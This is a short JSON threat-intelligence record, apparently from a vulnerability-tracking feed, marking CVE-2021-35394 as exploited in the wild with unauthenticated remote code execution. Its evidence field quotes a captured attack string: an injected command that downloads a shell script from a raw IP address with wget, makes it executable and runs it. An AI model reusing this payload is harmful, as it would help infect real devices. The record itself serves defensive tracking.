{"uuid": "aec8c947-3fea-48c3-9bec-d2cec737fac3", "vulnerability": {"vulnId": "CVE-2021-35394", "altId": []}, "gcve": {"origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd", "gna": 1, "object_uuid": "aec8c947-3fea-48c3-9bec-d2cec737fac3"}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-03-12T10:45:44+00:00"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"asserted_at": "2026-03-12T10:45:44", "last_seen_at": "2026-03-12T10:45:44", "first_seen_at": "2026-03-12T10:45:44"}, "scope": null, "evidence": [{"type": "sinkhole", "source": "cti-feed.circl.lu", "signal": "in_the_wild_attempts", "confidence": 1.0, "details": {"note": "orf;cd /tmp; /bin/busybox wget http://181.215.60.5:8084/dick.sh; chmod +x dick.sh; ./dick.sh; "}}], "references": null}